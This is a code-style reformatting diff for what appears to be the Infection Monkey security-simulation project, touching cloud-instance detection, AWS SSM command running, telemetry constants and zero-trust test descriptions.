a/monkey/common/cloud/azure/azure_instance.py +++ b/monkey/common/cloud/azure/azure_instance.py @@ -8,7 +8,9 @@ from common.cloud.instance import CloudInstance from common.common_consts.timeouts import SHORT_REQUEST_TIMEOUT LATEST_AZURE_METADATA_API_VERSION = "2019-04-30" -AZURE_METADATA_SERVICE_URL = "http://169.254.169.254/metadata/instance?api-version=%s" % LATEST_AZURE_METADATA_API_VERSION +AZURE_METADATA_SERVICE_URL = ( + "http://169.254.169.254/metadata/instance?api-version=%s" % LATEST_AZURE_METADATA_API_VERSION +) logger = logging.getLogger(__name__) @@ -18,6 +20,7 @@ class AzureInstance(CloudInstance): Access to useful information about the current machine if it's an Azure VM. Based on Azure metadata service: https://docs.microsoft.com/en-us/azure/virtual-machines/windows/instance-metadata-service """ + def is_instance(self): return self._on_azure @@ -34,9 +37,11 @@ class AzureInstance(CloudInstance): self._on_azure = False try: - response = requests.get(AZURE_METADATA_SERVICE_URL, - headers={"Metadata": "true"}, - timeout=SHORT_REQUEST_TIMEOUT) + response = requests.get( + AZURE_METADATA_SERVICE_URL, + headers={"Metadata": "true"}, + timeout=SHORT_REQUEST_TIMEOUT, + ) # If not on cloud, the metadata URL is non-routable and the connection will fail. # If on AWS, should get 404 since the metadata service URL is different, so bool(response) will be false. @@ -46,7 +51,9 @@ class AzureInstance(CloudInstance): else: logger.warning(f"Metadata response not ok: {response.status_code}") except requests.RequestException: - logger.debug("Failed to get response from Azure metadata service: This instance is not on Azure.") + logger.debug( + "Failed to get response from Azure metadata service: This instance is not on Azure." + ) def try_parse_response(self, response): try: diff --git a/monkey/common/cloud/azure/test_azure_instance.py b/monkey/common/cloud/azure/test_azure_instance.py index 680af90ed..7c5770446 100644 --- a/monkey/common/cloud/azure/test_azure_instance.py +++ b/monkey/common/cloud/azure/test_azure_instance.py @@ -3,84 +3,104 @@ import requests import requests_mock import simplejson -from common.cloud.azure.azure_instance import (AZURE_METADATA_SERVICE_URL, - AzureInstance) +from common.cloud.azure.azure_instance import AZURE_METADATA_SERVICE_URL, AzureInstance from common.cloud.environment_names import Environment GOOD_DATA = { - 'compute': {'azEnvironment': 'AZUREPUBLICCLOUD', - 'isHostCompatibilityLayerVm': 'true', - 'licenseType': 'Windows_Client', - 'location': 'westus', - 'name': 'examplevmname', - 'offer': 'Windows', - 'osProfile': {'adminUsername': 'admin', - 'computerName': 'examplevmname', - 'disablePasswordAuthentication': 'true'}, - 'osType': 'linux', - 'placementGroupId': 'f67c14ab-e92c-408c-ae2d-da15866ec79a', - 'plan': {'name': 'planName', - 'product': 'planProduct', - 'publisher': 'planPublisher'}, - 'platformFaultDomain': '36', - 'platformUpdateDomain': '42', - 'publicKeys': [{'keyData': 'ssh-rsa 0', - 'path': '/home/user/.ssh/authorized_keys0'}, - {'keyData': 'ssh-rsa 1', - 'path': '/home/user/.ssh/authorized_keys1'}], - 'publisher': 'RDFE-Test-Microsoft-Windows-Server-Group', - 'resourceGroupName': 'macikgo-test-may-23', - 'resourceId': '/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test-may-23/' - 'providers/Microsoft.Compute/virtualMachines/examplevmname', - 'securityProfile': {'secureBootEnabled': 'true', - 'virtualTpmEnabled': 'false'}, - 'sku': 'Windows-Server-2012-R2-Datacenter', - 'storageProfile': {'dataDisks': [{'caching': 'None', - 'createOption': 'Empty', - 'diskSizeGB': '1024', - 'image': {'uri': ''}, - 'lun': '0', - 'managedDisk': {'id': '/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/' - 'resourceGroups/macikgo-test-may-23/providers/' - 'Microsoft.Compute/disks/exampledatadiskname', - 'storageAccountType': 'Standard_LRS'}, - 'name': 'exampledatadiskname', - 'vhd': {'uri': ''}, - 'writeAcceleratorEnabled': 'false'}], - 'imageReference': {'id': '', - 'offer': 'UbuntuServer', - 'publisher': 'Canonical', - 'sku': '16.04.0-LTS', - 'version': 'latest'}, - 'osDisk': {'caching': 'ReadWrite', - 'createOption': 'FromImage', - 'diskSizeGB': '30', - 'diffDiskSettings': {'option': 'Local'}, - 'encryptionSettings': {'enabled': 'false'}, - 'image': {'uri': ''}, - 'managedDisk': {'id': '/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/' - 'resourceGroups/macikgo-test-may-23/providers/' - 'Microsoft.Compute/disks/exampleosdiskname', - 'storageAccountType': 'Standard_LRS'}, - 'name': 'exampleosdiskname', - 'osType': 'Linux', - 'vhd': {'uri': ''}, - 'writeAcceleratorEnabled': 'false'}}, - 'subscriptionId': 'xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx', - 'tags': 'baz:bash;foo:bar', - 'version': '15.05.22', - 'vmId': '02aab8a4-74ef-476e-8182-f6d2ba4166a6', - 'vmScaleSetName': 'crpteste9vflji9', - 'vmSize': 'Standard_A3', - 'zone': ''}, - 'network': {'interface': [{'ipv4': {'ipAddress': [{'privateIpAddress': '10.144.133.132', - 'publicIpAddress': ''}], - 'subnet': [{'address': '10.144.133.128', - 'prefix': '26'}]}, - 'ipv6': {'ipAddress': []}, - 'macAddress': '0011AAFFBB22'}]} - } + "compute": { + "azEnvironment": "AZUREPUBLICCLOUD", + "isHostCompatibilityLayerVm": "true", + "licenseType": "Windows_Client", + "location": "westus", + "name": "examplevmname", + "offer": "Windows", + "osProfile": { + "adminUsername": "admin", + "computerName": "examplevmname", + "disablePasswordAuthentication": "true", + }, + "osType": "linux", + "placementGroupId": "f67c14ab-e92c-408c-ae2d-da15866ec79a", + "plan": {"name": "planName", "product": "planProduct", "publisher": "planPublisher"}, + "platformFaultDomain": "36", + "platformUpdateDomain": "42", + "publicKeys": [ + {"keyData": "ssh-rsa 0", "path": "/home/user/.ssh/authorized_keys0"}, + {"keyData": "ssh-rsa 1", "path": "/home/user/.ssh/authorized_keys1"}, + ], + "publisher": "RDFE-Test-Microsoft-Windows-Server-Group", + "resourceGroupName": "macikgo-test-may-23", + "resourceId": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/resourceGroups/macikgo-test-may-23/" + "providers/Microsoft.Compute/virtualMachines/examplevmname", + "securityProfile": {"secureBootEnabled": "true", "virtualTpmEnabled": "false"}, + "sku": "Windows-Server-2012-R2-Datacenter", + "storageProfile": { + "dataDisks": [ + { + "caching": "None", + "createOption": "Empty", + "diskSizeGB": "1024", + "image": {"uri": ""}, + "lun": "0", + "managedDisk": { + "id": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/" + "resourceGroups/macikgo-test-may-23/providers/" + "Microsoft.Compute/disks/exampledatadiskname", + "storageAccountType": "Standard_LRS", + }, + "name": "exampledatadiskname", + "vhd": {"uri": ""}, + "writeAcceleratorEnabled": "false", + } + ], + "imageReference": { + "id": "", + "offer": "UbuntuServer", + "publisher": "Canonical", + "sku": "16.04.0-LTS", + "version": "latest", + }, + "osDisk": { + "caching": "ReadWrite", + "createOption": "FromImage", + "diskSizeGB": "30", + "diffDiskSettings": {"option": "Local"}, + "encryptionSettings": {"enabled": "false"}, + "image": {"uri": ""}, + "managedDisk": { + "id": "/subscriptions/xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx/" + "resourceGroups/macikgo-test-may-23/providers/" + "Microsoft.Compute/disks/exampleosdiskname", + "storageAccountType": "Standard_LRS", + }, + "name": "exampleosdiskname", + "osType": "Linux", + "vhd": {"uri": ""}, + "writeAcceleratorEnabled": "false", + }, + }, + "subscriptionId": "xxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxx", + "tags": "baz:bash;foo:bar", + "version": "15.05.22", + "vmId": "02aab8a4-74ef-476e-8182-f6d2ba4166a6", + "vmScaleSetName": "crpteste9vflji9", + "vmSize": "Standard_A3", + "zone": "", + }, + "network": { + "interface": [ + { + "ipv4": { + "ipAddress": [{"privateIpAddress": "10.144.133.132", "publicIpAddress": ""}], + "subnet": [{"address": "10.144.133.128", "prefix": "26"}], + }, + "ipv6": {"ipAddress": []}, + "macAddress": "0011AAFFBB22", + } + ] + }, +} BAD_DATA_NOT_JSON = '\n\n< javascript">\nvar pageName = \'/\';\ntop.location.replace(pageName);\n\n\n \n\n' -BAD_DATA_JSON = {'': ''} +BAD_DATA_JSON = {"": ""} def get_test_azure_instance(url, **kwargs): @@ -114,9 +134,9 @@ def test_get_cloud_provider_name_good_data(good_data_mock_instance): def test_try_parse_response_good_data(good_data_mock_instance): - assert good_data_mock_instance.instance_name == GOOD_DATA['compute']['name'] - assert good_data_mock_instance.instance_id == GOOD_DATA['compute']['vmId'] - assert good_data_mock_instance.location == GOOD_DATA['compute']['location'] + assert good_data_mock_instance.instance_name == GOOD_DATA["compute"]["name"] + assert good_data_mock_instance.instance_id == GOOD_DATA["compute"]["vmId"] + assert good_data_mock_instance.location == GOOD_DATA["compute"]["location"] # good request, bad data (json) diff --git a/monkey/common/cloud/gcp/gcp_instance.py b/monkey/common/cloud/gcp/gcp_instance.py index 6c14500db..14e4e554a 100644 --- a/monkey/common/cloud/gcp/gcp_instance.py +++ b/monkey/common/cloud/gcp/gcp_instance.py @@ -16,6 +16,7 @@ class GcpInstance(CloudInstance): """ Used to determine if on GCP. See https://cloud.google.com/compute/docs/storing-retrieving-metadata#runninggce """ + def is_instance(self): return self._on_gcp @@ -37,9 +38,17 @@ class GcpInstance(CloudInstance): logger.warning("Got unexpected GCP Metadata format") else: if not response.headers["Metadata-Flavor"] == "Google": - logger.warning("Got unexpected Metadata flavor: {}".format(response.headers["Metadata-Flavor"])) + logger.warning( + "Got unexpected Metadata flavor: {}".format( + response.headers["Metadata-Flavor"] + ) + ) else: - logger.warning("On GCP, but metadata response not ok: {}".format(response.status_code)) + logger.warning( + "On GCP, but metadata response not ok: {}".format(response.status_code) + ) except requests.RequestException: - logger.debug("Failed to get response from GCP metadata service: This instance is not on GCP") + logger.debug( + "Failed to get response from GCP metadata service: This instance is not on GCP" + ) self._on_gcp = False diff --git a/monkey/common/cloud/instance.py b/monkey/common/cloud/instance.py index abe0c7910..f0da19359 100644 --- a/monkey/common/cloud/instance.py +++ b/monkey/common/cloud/instance.py @@ -7,6 +7,7 @@ class CloudInstance(object): The current machine can be a cloud instance (for example EC2 instance or Azure VM). """ + def is_instance(self) -> bool: raise NotImplementedError() diff --git a/monkey/common/cloud/scoutsuite_consts.py b/monkey/common/cloud/scoutsuite_consts.py index 4db862a4a..091b51114 100644 --- a/monkey/common/cloud/scoutsuite_consts.py +++ b/monkey/common/cloud/scoutsuite_consts.py @@ -2,8 +2,8 @@ from enum import Enum class CloudProviders(Enum): - AWS = 'aws' - AZURE = 'azure' - GCP = 'gcp' - ALIBABA = 'aliyun' - ORACLE = 'oci' + AWS = "aws" + AZURE = "azure" + GCP = "gcp" + ALIBABA = "aliyun" + ORACLE = "oci" diff --git a/monkey/common/cmd/aws/aws_cmd_result.py b/monkey/common/cmd/aws/aws_cmd_result.py index 3499f8d14..1e89115ef 100644 --- a/monkey/common/cmd/aws/aws_cmd_result.py +++ b/monkey/common/cmd/aws/aws_cmd_result.py @@ -1,6 +1,6 @@ from common.cmd.cmd_result import CmdResult -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" class AwsCmdResult(CmdResult): @@ -10,8 +10,11 @@ class AwsCmdResult(CmdResult): def __init__(self, command_info): super(AwsCmdResult, self).__init__( - self.is_successful(command_info, True), command_info['ResponseCode'], command_info['StandardOutputContent'], - command_info['StandardErrorContent']) + self.is_successful(command_info, True), + command_info["ResponseCode"], + command_info["StandardOutputContent"], + command_info["StandardErrorContent"], + ) self.command_info = command_info @staticmethod @@ -22,4 +25,6 @@ class AwsCmdResult(CmdResult): :param is_timeout: Whether the given command timed out :return: True if successful, False otherwise. """ - return (command_info['Status'] == 'Success') or (is_timeout and (command_info['Status'] == 'InProgress')) + return (command_info["Status"] == "Success") or ( + is_timeout and (command_info["Status"] == "InProgress") + ) diff --git a/monkey/common/cmd/aws/aws_cmd_runner.py b/monkey/common/cmd/aws/aws_cmd_runner.py index 1ab680c4d..1ccdd104b 100644 --- a/monkey/common/cmd/aws/aws_cmd_runner.py +++ b/monkey/common/cmd/aws/aws_cmd_runner.py @@ -5,7 +5,7 @@ from common.cmd.aws.aws_cmd_result import AwsCmdResult from common.cmd.cmd_runner import CmdRunner from common.cmd.cmd_status import CmdStatus -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" logger = logging.getLogger(__name__) @@ -19,7 +19,7 @@ class AwsCmdRunner(CmdRunner): super(AwsCmdRunner, self).__init__(is_linux) self.instance_id = instance_id self.region = region - self.ssm = AwsService.get_client('ssm', region) + self.ssm = AwsService.get_client("ssm", region) def query_command(self, command_id): return self.ssm.get_command_invocation(CommandId=command_id, InstanceId=self.instance_id) @@ -28,15 +28,18 @@ class AwsCmdRunner(CmdRunner): return AwsCmdResult(command_info) def get_command_status(self, command_info): - if command_info['Status'] == 'InProgress': + if command_info["Status"] == "InProgress": return CmdStatus.IN_PROGRESS - elif command_info['Status'] == 'Success': + elif command_info["Status"] == "Success": return CmdStatus.SUCCESS else: return CmdStatus.FAILURE def run_command_async(self, command_line): doc_name = "AWS-RunShellScript" if self.is_linux else "AWS-RunPowerShellScript" - command_res = self.ssm.send_command(DocumentName=doc_name, Parameters={'commands': [command_line]}, - InstanceIds=[self.instance_id]) - return command_res['Command']['CommandId'] + command_res = self.ssm.send_command( + DocumentName=doc_name, + Parameters={"commands": [command_line]}, + InstanceIds=[self.instance_id], + ) + return command_res["Command"]["CommandId"] diff --git a/monkey/common/cmd/cmd.py b/monkey/common/cmd/cmd.py index 8cb2177a2..a1894eb54 100644 --- a/monkey/common/cmd/cmd.py +++ b/monkey/common/cmd/cmd.py @@ -1,4 +1,4 @@ -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" class Cmd(object): diff --git a/monkey/common/cmd/cmd_result.py b/monkey/common/cmd/cmd_result.py index d3039736f..6d2a4621d 100644 --- a/monkey/common/cmd/cmd_result.py +++ b/monkey/common/cmd/cmd_result.py @@ -1,4 +1,4 @@ -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" class CmdResult(object): diff --git a/monkey/common/cmd/cmd_runner.py b/monkey/common/cmd/cmd_runner.py index 5cc40ca24..57966d0b5 100644 --- a/monkey/common/cmd/cmd_runner.py +++ b/monkey/common/cmd/cmd_runner.py @@ -6,7 +6,7 @@ from common.cmd.cmd import Cmd from common.cmd.cmd_result import CmdResult from common.cmd.cmd_status import CmdStatus -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" logger = logging.getLogger(__name__) @@ -64,7 +64,7 @@ class CmdRunner(object): command_result_pairs = CmdRunner.wait_commands(list(command_instance_dict.keys())) for command, result in command_result_pairs: instance = command_instance_dict[command] - instance_results[instance['instance_id']] = inst_n_cmd_res_to_res(instance, result) + instance_results[instance["instance_id"]] = inst_n_cmd_res_to_res(instance, result) return instance_results @@ -91,7 +91,9 @@ class CmdRunner(object): results = [] while (curr_time - init_time < timeout) and (len(commands) != 0): - for command in list(commands): # list(commands) clones the list. We do so because we remove items inside + for command in list( + commands + ): # list(commands) clones the list. We do so because we remove items inside CmdRunner._process_command(command, commands, results, True) time.sleep(CmdRunner.WAIT_SLEEP_TIME) @@ -102,8 +104,11 @@ class CmdRunner(object): for command, result in results: if not result.is_success: - logger.error('The following command failed: `%s`. status code: %s', - str(command[1]), str(result.status_code)) + logger.error( + "The following command failed: `%s`. status code: %s", + str(command[1]), + str(result.status_code), + ) return results @@ -148,11 +153,13 @@ class CmdRunner(object): c_id = command.cmd_id try: command_info = c_runner.query_command(c_id) - if (not should_process_only_finished) or c_runner.get_command_status(command_info) != CmdStatus.IN_PROGRESS: + if (not should_process_only_finished) or c_runner.get_command_status( + command_info + ) != CmdStatus.IN_PROGRESS: commands.remove(command) results.append((command, c_runner.get_command_result(command_info))) except Exception: - logger.exception('Exception while querying command: `%s`', str(c_id)) + logger.exception("Exception while querying command: `%s`", str(c_id)) if not should_process_only_finished: commands.remove(command) results.append((command, CmdResult(False))) diff --git a/monkey/common/cmd/cmd_status.py b/monkey/common/cmd/cmd_status.py index 2fc9cc168..a4e435239 100644 --- a/monkey/common/cmd/cmd_status.py +++ b/monkey/common/cmd/cmd_status.py @@ -1,6 +1,6 @@ from enum import Enum -__author__ = 'itay.mizeretz' +__author__ = "itay.mizeretz" class CmdStatus(Enum): diff --git a/monkey/common/common_consts/api_url_consts.py b/monkey/common/common_consts/api_url_consts.py index 4fef6b11b..91f289218 100644 --- a/monkey/common/common_consts/api_url_consts.py +++ b/monkey/common/common_consts/api_url_consts.py @@ -1 +1 @@ -T1216_PBA_FILE_DOWNLOAD_PATH = '/api/t1216-pba/download' +T1216_PBA_FILE_DOWNLOAD_PATH = "/api/t1216-pba/download" diff --git a/monkey/common/common_consts/network_consts.py b/monkey/common/common_consts/network_consts.py index b194c9421..8966c23d7 100644 --- a/monkey/common/common_consts/network_consts.py +++ b/monkey/common/common_consts/network_consts.py @@ -1 +1 @@ -ES_SERVICE = 'elastic-search-9200' +ES_SERVICE = "elastic-search-9200" diff --git a/monkey/common/common_consts/telem_categories.py b/monkey/common/common_consts/telem_categories.py index 70066d290..280cfce05 100644 --- a/monkey/common/common_consts/telem_categories.py +++ b/monkey/common/common_consts/telem_categories.py @@ -1,10 +1,10 @@ class TelemCategoryEnum: - EXPLOIT = 'exploit' - POST_BREACH = 'post_breach' - SCAN = 'scan' - SCOUTSUITE = 'scoutsuite' - STATE = 'state' - SYSTEM_INFO = 'system_info' - TRACE = 'trace' - TUNNEL = 'tunnel' - ATTACK = 'attack' + EXPLOIT = "exploit" + POST_BREACH = "post_breach" + SCAN = "scan" + SCOUTSUITE = "scoutsuite" + STATE = "state" + SYSTEM_INFO = "system_info" + TRACE = "trace" + TUNNEL = "tunnel" + ATTACK = "attack" diff --git a/monkey/common/common_consts/zero_trust_consts.py b/monkey/common/common_consts/zero_trust_consts.py index e6a6b29c5..539bb7265 100644 --- a/monkey/common/common_consts/zero_trust_consts.py +++ b/monkey/common/common_consts/zero_trust_consts.py @@ -13,7 +13,15 @@ DEVICES = "Devices" NETWORKS = "Networks" PEOPLE = "People" DATA = "Data" -PILLARS = (DATA, PEOPLE, NETWORKS, DEVICES, WORKLOADS, VISIBILITY_ANALYTICS, AUTOMATION_ORCHESTRATION) +PILLARS = ( + DATA, + PEOPLE, + NETWORKS, + DEVICES, + WORKLOADS, + VISIBILITY_ANALYTICS, + AUTOMATION_ORCHESTRATION, +) STATUS_UNEXECUTED = "Unexecuted" STATUS_PASSED = "Passed" @@ -57,7 +65,7 @@ TESTS = ( TEST_SCOUTSUITE_SECURE_AUTHENTICATION, TEST_SCOUTSUITE_RESTRICTIVE_POLICIES, TEST_SCOUTSUITE_LOGGING, - TEST_SCOUTSUITE_SERVICE_SECURITY + TEST_SCOUTSUITE_SERVICE_SECURITY, ) PRINCIPLE_DATA_CONFIDENTIALITY = "data_transit" @@ -78,10 +86,10 @@ PRINCIPLES = { PRINCIPLE_DATA_CONFIDENTIALITY: "Ensure data's confidentiality by encrypting it.", PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES: "Configure network policies to be as restrictive as possible.", PRINCIPLE_USERS_MAC_POLICIES: "Users' permissions to the network and to resources should be MAC (Mandatory " - "Access Control) only.", + "Access Control) only.", PRINCIPLE_DISASTER_RECOVERY: "Ensure data and infrastructure backups for disaster recovery scenarios.", PRINCIPLE_SECURE_AUTHENTICATION: "Ensure secure authentication process's.", - PRINCIPLE_MONITORING_AND_LOGGING: "Ensure monitoring and logging in network resources." + PRINCIPLE_MONITORING_AND_LOGGING: "Ensure monitoring and logging in network resources.", } POSSIBLE_STATUSES_KEY = "possible_statuses" @@ -92,183 +100,183 @@ TEST_EXPLANATION_KEY = "explanation" TESTS_MAP = { TEST_SEGMENTATION: { TEST_EXPLANATION_KEY: "The Monkey tried to scan and find machines that it can communicate with from the machine it's " - "running on, that belong to different network segments.", + "running on, that belong to different network segments.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "Monkey performed cross-segment communication. Check firewall rules and logs.", - STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs." + STATUS_PASSED: "Monkey couldn't perform cross-segment communication. If relevant, check firewall logs.", }, PRINCIPLE_KEY: PRINCIPLE_SEGMENTATION, PILLARS_KEY: [NETWORKS], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_PASSED, STATUS_FAILED], }, TEST_MALICIOUS_ACTIVITY_TIMELINE: { TEST_EXPLANATION_KEY: "The Monkeys in the network performed malicious-looking actions, like scanning and attempting " - "exploitation.", + "exploitation.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_VERIFY: "Monkey performed malicious actions in the network. Check SOC logs and alerts." }, PRINCIPLE_KEY: PRINCIPLE_ANALYZE_NETWORK_TRAFFIC, PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY], }, TEST_ENDPOINT_SECURITY_EXISTS: { TEST_EXPLANATION_KEY: "The Monkey checked if there is an active process of an endpoint security software.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "Monkey didn't find ANY active endpoint security processes. Install and activate anti-virus " - "software on endpoints.", + "software on endpoints.", STATUS_PASSED: "Monkey found active endpoint security processes. Check their logs to see if Monkey was a " - "security concern. " + "security concern. ", }, PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY, PILLARS_KEY: [DEVICES], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], }, TEST_MACHINE_EXPLOITED: { TEST_EXPLANATION_KEY: "The Monkey tries to exploit machines in order to breach them and propagate in the network.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "Monkey successfully exploited endpoints. Check IDS/IPS logs to see activity recognized and see " - "which endpoints were compromised.", - STATUS_PASSED: "Monkey didn't manage to exploit an endpoint." + "which endpoints were compromised.", + STATUS_PASSED: "Monkey didn't manage to exploit an endpoint.", }, PRINCIPLE_KEY: PRINCIPLE_ENDPOINT_SECURITY, PILLARS_KEY: [DEVICES], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_VERIFY], }, TEST_SCHEDULED_EXECUTION: { TEST_EXPLANATION_KEY: "The Monkey was executed in a scheduled manner.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_VERIFY: "Monkey was executed in a scheduled manner. Locate this activity in User-Behavior security " - "software.", - STATUS_PASSED: "Monkey failed to execute in a scheduled manner." + "software.", + STATUS_PASSED: "Monkey failed to execute in a scheduled manner.", }, PRINCIPLE_KEY: PRINCIPLE_USER_BEHAVIOUR, PILLARS_KEY: [PEOPLE, NETWORKS], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_VERIFY], }, TEST_DATA_ENDPOINT_ELASTIC: { TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to ElasticSearch instances.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "Monkey accessed ElasticSearch instances. Limit access to data by encrypting it in in-transit.", STATUS_PASSED: "Monkey didn't find open ElasticSearch instances. If you have such instances, look for alerts " - "that indicate attempts to access them. " + "that indicate attempts to access them. ", }, PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY, PILLARS_KEY: [DATA], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], }, TEST_DATA_ENDPOINT_HTTP: { TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to HTTP servers.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "Monkey accessed HTTP servers. Limit access to data by encrypting it in in-transit.", STATUS_PASSED: "Monkey didn't find open HTTP servers. If you have such servers, look for alerts that indicate " - "attempts to access them. " + "attempts to access them. ", }, PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY, PILLARS_KEY: [DATA], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], }, TEST_DATA_ENDPOINT_POSTGRESQL: { TEST_EXPLANATION_KEY: "The Monkey scanned for unencrypted access to PostgreSQL servers.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "Monkey accessed PostgreSQL servers. Limit access to data by encrypting it in in-transit.", STATUS_PASSED: "Monkey didn't find open PostgreSQL servers. If you have such servers, look for alerts that " - "indicate attempts to access them. " + "indicate attempts to access them. ", }, PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY, PILLARS_KEY: [DATA], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], }, TEST_TUNNELING: { TEST_EXPLANATION_KEY: "The Monkey tried to tunnel traffic using other monkeys.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "Monkey tunneled its traffic using other monkeys. Your network policies are too permissive - " - "restrict them. " + "restrict them. " }, PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES, PILLARS_KEY: [NETWORKS, VISIBILITY_ANALYTICS], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED], }, TEST_COMMUNICATE_AS_NEW_USER: { TEST_EXPLANATION_KEY: "The Monkey tried to create a new user and communicate with the internet from it.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "Monkey caused a new user to access the network. Your network policies are too permissive - " - "restrict them to MAC only.", - STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network." + "restrict them to MAC only.", + STATUS_PASSED: "Monkey wasn't able to cause a new user to access the network.", }, PRINCIPLE_KEY: PRINCIPLE_USERS_MAC_POLICIES, PILLARS_KEY: [PEOPLE, NETWORKS, VISIBILITY_ANALYTICS], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], }, TEST_SCOUTSUITE_PERMISSIVE_FIREWALL_RULES: { TEST_EXPLANATION_KEY: "ScoutSuite assessed cloud firewall rules and settings.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "ScoutSuite found overly permissive firewall rules.", - STATUS_PASSED: "ScoutSuite found no problems with cloud firewall rules." + STATUS_PASSED: "ScoutSuite found no problems with cloud firewall rules.", }, PRINCIPLE_KEY: PRINCIPLE_RESTRICTIVE_NETWORK_POLICIES, PILLARS_KEY: [NETWORKS], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], }, TEST_SCOUTSUITE_UNENCRYPTED_DATA: { TEST_EXPLANATION_KEY: "ScoutSuite searched for resources containing unencrypted data.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "ScoutSuite found resources with unencrypted data.", - STATUS_PASSED: "ScoutSuite found no resources with unencrypted data." + STATUS_PASSED: "ScoutSuite found no resources with unencrypted data.", }, PRINCIPLE_KEY: PRINCIPLE_DATA_CONFIDENTIALITY, PILLARS_KEY: [DATA], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], }, TEST_SCOUTSUITE_DATA_LOSS_PREVENTION: { TEST_EXPLANATION_KEY: "ScoutSuite searched for resources which are not protected against data loss.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "ScoutSuite found resources not protected against data loss.", - STATUS_PASSED: "ScoutSuite found that all resources are secured against data loss." + STATUS_PASSED: "ScoutSuite found that all resources are secured against data loss.", }, PRINCIPLE_KEY: PRINCIPLE_DISASTER_RECOVERY, PILLARS_KEY: [DATA], - POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED] + POSSIBLE_STATUSES_KEY: [STATUS_UNEXECUTED, STATUS_FAILED, STATUS_PASSED], }, TEST_SCOUTSUITE_SECURE_AUTHENTICATION: { TEST_EXPLANATION_KEY: "ScoutSuite searched for issues related to users' authentication.", FINDING_EXPLANATION_BY_STATUS_KEY: { STATUS_FAILED: "ScoutSuite found issues related to users' authentication.", - STATUS_PASSED: "ScoutSuite found no issues related to users' authentication." + STATUS_PASSED: "ScoutSuite found no issues related to users' authentication.", }, PRINCIPLE_KEY: PRINCIPLE_SECURE_AUTHENTICATION, 